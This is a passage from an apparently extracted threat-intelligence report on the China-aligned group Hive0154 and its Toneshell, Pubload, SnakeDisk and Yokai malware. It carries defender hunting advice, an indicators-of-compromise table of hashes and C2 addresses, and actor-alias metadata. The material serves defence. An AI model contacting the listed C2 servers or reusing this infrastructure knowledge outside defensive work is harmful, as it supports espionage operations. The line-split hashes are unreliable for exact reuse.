capable threat actor with multiple active subclusters and frequent development cycles.\r\nX-Force assesses with high confidence that China-aligned groups like Hive0154 will continue to refine their large\r\nmalware arsenal and target public and private organizations worldwide. The malware discussed in the report above\r\nis likely still in early development, allowing defenders to adopt detection mechanisms before their widespread use.\r\nEntities at risk of Hive0154 espionage should remain at a heightened state of defensive security and remain\r\nvigilant with regard to the techniques mentioned in this report and review the following recommendations:\r\nExercise caution with emails or PDFs containing Google Drive, Box Cloud Storage or Dropbox download\r\nlinks\r\nExercise caution with downloaded archives, even if they do contain expected documents. Train staff to\r\ndisplay and recognize unexpected file extensions\r\nMonitor and hunt in networks for TLS 1.2 Application Data packets (header: 17 03 03) without a previous\r\nTLS handshake as a sign of a Pubload or Toneshell beacon\r\nMonitor and hunt for USB drives containing suspicious executable names, DLLs and hidden directories\r\nwhich could indicate a device infected with a USB worm\r\nMonitor and hunt for suspicious and unknown directories in C:\\ProgramData\\ which contain a legitimate\r\nEXE vulnerable to DLL sideloading and a corresponding DLL\r\nMonitor and hunt for persistence techniques in the registry and scheduled tasks\r\nHunt for processes, network traffic and IoCs detailed in this report\r\nMonitor any unusual network, persistence, or file modification activity coming from seemingly benign\r\nprocess executables that sideload a malicious DLL\r\nIndicators of compromise\r\nIndicator\r\nIndicator\r\nType\r\nContext\r\nf8b28cae687bd55a148d363d58f1\r\n3a797486f12221f0e0d080ffb53611\r\nd54231\r\nSHA256 Weaponized archive delivering Toneshell8\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 25 of 29\n\n8132beeb25ce7baed0b561922d26\r\n4b2a9852957df7b6a3daacfbb3a9\r\n69485c79\r\nSHA256 Weaponized archive delivering Toneshell8\r\nd1466dca25e28f0b7fae71d5c2abc0\r\n7b397037a9e674f38602690e96cc5\r\nb2bd4\r\nSHA256 Weaponized archive delivering Toneshell8\r\n1272a0853651069ed4dc505007e85\r\n25f99e1454f9e033bcc2e58d60fdaf\r\na4f02\r\nSHA256 Weaponized archive delivering Toneshell8\r\nb8c31b8d8af9e6eae15f30019e39c\r\n52b1a53aa1c8b0c93c8d075254ed\r\n10d8dfc \r\nSHA256 Weaponized archive delivering Toneshell7\r\n7087e84f69c47910fd39c3869a70\r\n6e55324783af8d03465a9e7bfde\r\n52fe4d1d6 \r\nSHA256 Weaponized archive delivering Pubload\r\n38fcd10100f1bfd75f8dc0883b0c\r\n2cb48321ef1c57906798a422f2a2\r\nde17d50c \r\nSHA256 Weaponized archive delivering Pubload\r\n69cb87b2d8ee50f46dae791b5a0\r\nc5735a7554cc3c21bb1d989baa0f3\r\n8c45085c\r\nSHA256\r\nPDF containing download URL for weaponized\r\narchive\r\n564a03763879aaed4da8a8c1d60\r\n67f4112d8e13bb46c2f80e0fcb9ffd\r\nd40384c\r\nSHA256 Loader injecting Toneshell7\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 26 of 29\n\ne4bb60d899699fd84126f9fa0df\r\nf72314610c56fffca3d11f3b6fc93fc\r\nb75e00 \r\nSHA256 Loader injecting Pubload\r\nc2d1ff85e9bb8feb14fd015dceee1\r\n66c2e52e2226c07e23acc348815\r\nc0eb4608 \r\nSHA256 Loader injecting Pubload\r\n188.208.141[.]196 IPv4 Pubload C2 server\r\nbdbc936ddc9234385317c4ee83\r\nbda087e389235c4a182736fc597\r\n565042f7644\r\nSHA256 Toneshell8 backdoor\r\nf0fec3b271b83e23ed7965198f3b\r\n00eece45bd836bf10c038e99106\r\n75bafefb1\r\nSHA256 Toneshell8 backdoor\r\ne7b29611c789a6225aebbc9fee37\r\n10a57b51537693cb2ec16e2177c22\r\n392b546\r\nSHA256 Toneshell8 backdoor\r\n9ca5b2cbc3677a5967c448d9d21\r\neb56956898ccd08c06b372c6471f\r\nb68d37d7d\r\nSHA256 Toneshell8 backdoor\r\n146.70.29[.]229 IPv4 Toneshell7/Toneshell8 C2 server\r\n318a1ebc0692d1d012d20d306\r\nd6634b196cc387b1f4bc38f97d\r\nd437f117c7e20\r\nSHA256 Toneshell9 backdoor\r\n0d632a8f6dd69566ad98db56\r\ne53c8f16286a59ea2bea81c2761\r\nSHA256 Weaponized archive delivering Toneshell9\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 27 of 29\n\nd43b6ab4ecafd\r\n39e7bbcceddd16f6c4f2fc2335a\r\n50c534e182669cb5fa90cbe29e\r\n49ec6dfd0df\r\nSHA256 Weaponized archive delivering Toneshell9\r\n05eb6a06b404b6340960d7a6\r\ncf6b1293e706ce00d7cba9a8b7\r\n2b3780298dc25d\r\nSHA256\r\nLoader containing Toneshell fork which served as a\r\nbasis for Toneshell9\r\n123.253.34[.]44 IPv4 Toneshell9 C2 server\r\nwww.slickvpn[.]com Domain Toneshell9 C2 server\r\ndd694aaf44731da313e4594d\r\n6ca34a6b8e0fcce505e39f827\r\n3b9242fdf6220e0\r\nSHA256 SnakeDisk USB worm\r\nbb5bb82e5caf7d4dbbe878b7\r\n5b23f793a5f3c5ca6dba70d8b\r\ne447e8c004d26ce \r\nSHA256\r\nSnakeDisk's benign EXE payload used for DLL\r\nsideloading Yokai\r\n35bec1d8699d29c27b66e564\r\n6e58d25ce85ea1e41481d048b\r\ncea89ea94f8fb4b \r\nSHA256 Yokai backdoor DLL\r\nhttp://118.174.183[.]89/kptinfo\r\n/import/index.php\r\nURL Yokai C2 server\r\nIBM X-Force Premier Threat Intelligence is now integrated with OpenCTI by Filigran, delivering actionable\r\nthreat intelligence about this threat activity and more. Access insights on threat actors, malware, and industry\r\nrisks. Install the X-Force OpenCTI Connector to enhance detection and response, strengthening your\r\ncybersecurity with IBM X-Force’s expertise. Get a 30-Day X-Force Premier Threat Intelligence trial today!\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 28 of 29\n\nSource: https://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nhttps://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor\r\nPage 29 of 29", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "origins": [ "web" ], "references": [ "https://www.ibm.com/think/x-force/hive0154-drops-updated-toneshell-backdoor" ], "report_names": [ "hive0154-drops-updated-toneshell-backdoor" ], "threat_actors": [ { "id": "93542ae8-73cb-482b-90a3-445a20663f15", "created_at": "2022-10-25T16:07:24.058412Z", "updated_at": "2026-04-10T02:00:04.853499Z", "deleted_at": null, "main_name": "PKPLUG", "aliases": [ "Stately Taurus" ], "source_name": "ETDA:PKPLUG", "tools": [], "source_id": "ETDA", "reports": null }, { "id": "f8dddd06-da24-4184-9e24-4c22bdd1cbbf", "created_at": "2023-01-06T13:46:38.626906Z", "updated_at": "2026-04-10T02:00:03.043681Z", "deleted_at": null, "main_name": "Tick", "aliases": [ "G0060", "Stalker Taurus", "PLA Unit 61419", "Swirl Typhoon", "Nian", "BRONZE BUTLER", "REDBALDKNIGHT", "STALKER PANDA" ], "source_name": "MISPGALAXY:Tick", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "b69037ec-2605-4de4-bb32-a20d780a8406", "created_at": "2023-01-06T13:46:38.790766Z", "updated_at": "2026-04-10T02:00:03.101635Z", "deleted_at": null, "main_name": "MUSTANG PANDA", "aliases": [ "Stately Taurus", "LuminousMoth", "TANTALUM", "Twill Typhoon", "TEMP.HEX", "Earth Preta", "Polaris", "BRONZE PRESIDENT", "HoneyMyte", "Red Lich", "TA416" ], "source_name": "MISPGALAXY:MUSTANG PANDA", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "54e55585-1025-49d2-9de8-90fc7a631f45", "created_at": "2025-08-07T02:03:24.563488Z", "updated_at": "2026-04-10T02:00:03.715427Z", "deleted_at": null, "main_name": "BRONZE BUTLER", "aliases": [ "CTG-2006 ", "Daserf", "Stalker Panda ", "Swirl Typhoon ", "Tick " ], "source_name": "Secureworks:BRONZE BUTLER", "tools": [ "ABK", "BBK", "Casper", "DGet", "Daserf", "Datper", "Ghostdown", "Gofarer", "MSGet", "Mimikatz", "Netboy", "RarStar", "Screen Capture Tool", "ShadowPad", "ShadowPy", "T-SMB", "down_new", "gsecdump" ], "source_id": "Secureworks", "reports": null }, { "id": "20b5fa2f-2ef1-4e69-8275-25927a762f72", "created_at": "2025-08-07T02:03:24.573647Z", "updated_at": "2026-04-10T02:00:03.765721Z", "deleted_at": null, "main_name": "BRONZE DUDLEY", "aliases": [ "TA428 ", "Temp.Hex ", "Vicious Panda " ], "source_name": "Secureworks:BRONZE DUDLEY", "tools": [ "NCCTrojan", "PhantomNet", "PoisonIvy", "Royal Road" ], "source_id": "Secureworks", "reports": null }, { "id": "6daadf00-952c-408a-89be-aa490d891743", "created_at": "2025-08-07T02:03:24.654882Z", "updated_at": "2026-04-10T02:00:03.645565Z", "deleted_at": null, "main_name": "BRONZE PRESIDENT", "aliases": [ "Earth Preta ", "HoneyMyte ", "Mustang Panda ", "Red Delta ", "Red Lich ", "Stately Taurus ", "TA416 ", "Temp.Hex ", "Twill Typhoon " ], "source_name": "Secureworks:BRONZE PRESIDENT", "tools": [ "BlueShell", "China Chopper", "Claimloader", "Cobalt Strike", "HIUPAN", "ORat", "PTSOCKET", "PUBLOAD", "PlugX", "RCSession", "TONESHELL", "TinyNote" ], "source_id": "Secureworks", "reports": null }, { "id": "fad89cb7-83e8-4d8c-8cf8-dce2c6e54479", "created_at": "2023-10-27T02:00:07.764261Z", "updated_at": "2026-04-10T02:00:03.378226Z", "deleted_at": null, "main_name": "Camaro Dragon", "aliases": [], "source_name": "MISPGALAXY:Camaro Dragon", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9baa7519-772a-4862-b412-6f0463691b89", "created_at": "2022-10-25T15:50:23.354429Z", "updated_at": "2026-04-10T02:00:05.310361Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Mustang Panda", "TA416", "RedDelta", "BRONZE PRESIDENT", "STATELY TAURUS", "FIREANT", "CAMARO DRAGON", "EARTH PRETA", "HIVE0154", "TWILL TYPHOON", "TANTALUM", "LUMINOUS MOTH", "UNC6384", "TEMP.Hex", "Red Lich" ], "source_name": "MITRE:Mustang Panda", "tools": [ "CANONSTAGER", "STATICPLUGIN", "ShadowPad", "TONESHELL", "Cobalt Strike", "HIUPAN", "Impacket", "SplatCloak", "PAKLOG", "Wevtutil", "AdFind", "CLAIMLOADER", "Mimikatz", "PUBLOAD", "StarProxy", "CorKLOG", "RCSession", "NBTscan", "PoisonIvy", "SplatDropper", "China Chopper", "PlugX" ], "source_id": "MITRE", "reports": null }, { "id": "d4e7cd9a-2290-4f89-a645-85b9a46d004b", "created_at": "2022-10-25T16:07:23.419513Z", "updated_at": "2026-04-10T02:00:04.591062Z", "deleted_at": null, "main_name": "Bronze Butler", "aliases": [ "Bronze Butler", "CTG-2006", "G0060", "Operation ENDTRADE", "RedBaldNight", "Stalker Panda", "Stalker Taurus", "Swirl Typhoon", "TEMP.Tick", "Tick" ], "source_name": "ETDA:Bronze Butler", "tools": [ "8.t Dropper", "8.t RTF exploit builder", "8t_dropper", "9002 RAT", "AngryRebel", "Blogspot", "Daserf", "Datper", "Elirks", "Farfli", "Gh0st RAT", "Ghost RAT", "HOMEUNIX", "HidraQ", "HomamDownloader", "Homux", "Hydraq", "Lilith", "Lilith RAT", "McRAT", "MdmBot", "Mimikatz", "Minzen", "Moudour", "Muirim", "Mydoor", "Nioupale", "PCRat", "POISONPLUG.SHADOW", "Roarur", "RoyalRoad", "ShadowPad Winnti", "ShadowWali", "ShadowWalker", "SymonLoader", "WCE", "Wali", "Windows Credential Editor", "Windows Credentials Editor", "XShellGhost", "XXMM", "gsecdump", "rarstar" ], "source_id": "ETDA", "reports": null }, { "id": "2ee03999-5432-4a65-a850-c543b4fefc3d", "created_at": "2022-10-25T16:07:23.882813Z", "updated_at": "2026-04-10T02:00:04.776949Z", "deleted_at": null, "main_name": "Mustang Panda", "aliases": [ "Bronze President", "Camaro Dragon", "Earth Preta", "G0129", "Hive0154", "HoneyMyte", "Mustang Panda", "Operation SMUGX", "Operation SmugX", "PKPLUG", "Red Lich", "Stately Taurus", "TEMP.Hex", "Twill Typhoon" ], "source_name": "ETDA:Mustang Panda", "tools": [ "9002 RAT", "AdFind", "Agent.dhwf", "Agentemis", "CHINACHOPPER", "China Chopper", "Chymine", "ClaimLoader", "Cobalt Strike", "CobaltStrike", "DCSync", "DOPLUGS", "Darkmoon", "Destroy RAT", "DestroyRAT", "Farseer", "Gen:Trojan.Heur.PT", "HOMEUNIX", "Hdump", "HenBox", "HidraQ", "Hodur", "Homux", "HopperTick", "Hydraq", "Impacket", "Kaba", "Korplug", "LadonGo", "MQsTTang", "McRAT", "MdmBot", "Mimikatz", "NBTscan", "NetSess", "Netview", "Orat", "POISONPLUG.SHADOW", "PUBLOAD", "PVE Find AD Users", "PlugX", "Poison Ivy", "PowerView", "QMAGENT", "RCSession", "RedDelta", "Roarur", "SPIVY", "ShadowPad Winnti", "SinoChopper", "Sogu", "TIGERPLUG", "TONEINS", "TONESHELL", "TVT", "TeamViewer", "Thoper", "TinyNote", "WispRider", "WmiExec", "XShellGhost", "Xamtrav", "Zupdax", "cobeacon", "nbtscan", "nmap", "pivy", "poisonivy" ], "source_id": "ETDA", "reports": null } ], "ts_created_at": 1775434114, "ts_updated_at": 1775826690, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/37cd3681fbd8728979cff325ff205b4378d460c4.pdf", "text": "https://archive.orkl.eu/37cd3681fbd8728979cff325ff205b4378d460c4.txt", "img": "https://archive.orkl.eu/37cd3681fbd8728979cff325ff205b4378d460c4.jpg" } }